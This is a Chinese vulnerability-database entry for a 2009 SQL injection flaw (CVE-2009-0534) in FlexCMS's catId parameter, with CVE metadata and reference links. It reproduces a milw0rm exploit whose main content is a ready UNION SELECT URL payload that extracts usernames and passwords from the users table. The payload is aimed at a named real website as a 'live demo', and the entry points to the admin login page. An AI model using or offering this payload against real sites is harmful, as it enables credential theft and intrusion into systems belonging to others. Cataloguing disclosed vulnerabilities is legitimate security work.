FlexCMS 参数catId SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117373 漏洞类型 SQL注入
发布时间 2009-02-09 更新时间 2009-02-12
CVE编号 CVE-2009-0534 CNNVD-ID CNNVD-200902-281
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8018
https://cxsecurity.com/issue/WLB-2009020175
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-281
|漏洞详情
FlexCMS是一款小巧易用的内容管理系统(CMS)工具。FlexCMS存在SQL注入漏洞。远程攻击者可以借助catid参数,执行任意的SQL指令。
|漏洞EXP
AUTHOR: MisterRichard

FlexCMS Remote SQL Injection

Discovered by MisterRichard.

Developer site: http://www.flexcms.dk/

Developer has not been notified.

Live demo:

Injection: www.target.com/flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--

http://www.radikalungdom.dk/flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--

Admin login site:

http://target.com/flexadmin/

Greetz, agonx, kollek, cardingnu

# milw0rm.com [2009-02-09]
|参考资料

来源:XF
名称:flexcms-catid-sql-injection(48609)
链接:http://xforce.iss.net/xforce/xfdb/48609
来源:BID
名称:33696
链接:http://www.securityfocus.com/bid/33696
来源:MILW0RM
名称:8018
链接:http://www.milw0rm.com/exploits/8018